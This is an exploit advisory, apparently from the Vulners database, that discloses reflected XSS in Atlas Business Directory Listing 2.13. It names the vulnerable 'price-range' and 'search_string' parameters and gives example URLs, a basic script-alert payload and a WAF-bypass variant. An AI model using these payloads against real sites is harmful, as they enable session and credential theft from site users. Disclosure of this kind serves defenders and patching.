`# Exploit Title: Atlas Business Directory Listing 2.13 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 09/07/2023
# Vendor: Creativeitem
# Vendor Homepage: https://creativeitem.com/
# Software Link: https://demo.creativeitem.com/atlas/
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
## Description
The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /atlas/home/filter_listings
GET parameter 'price-range' is vulnerable to XSS
https://website/atlas/home/filter_listings?category=family-style&&amenity=good-for-kids&&city=marseille&&price-range=790[XSS]&&video=1&&status=open
Path: /atlas/home/search
GET parameter 'search_string' is vulnerable to XSS
https://website/atlas/home/search?search_string=[XSS]&selected_city_id=&selected_category_id=11
Simple XSS Payload (Blocked by WAF) : <script>alert(1)</script>
XSS Filter Bypass : "><script>alert(1)</script>
[-] Done
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation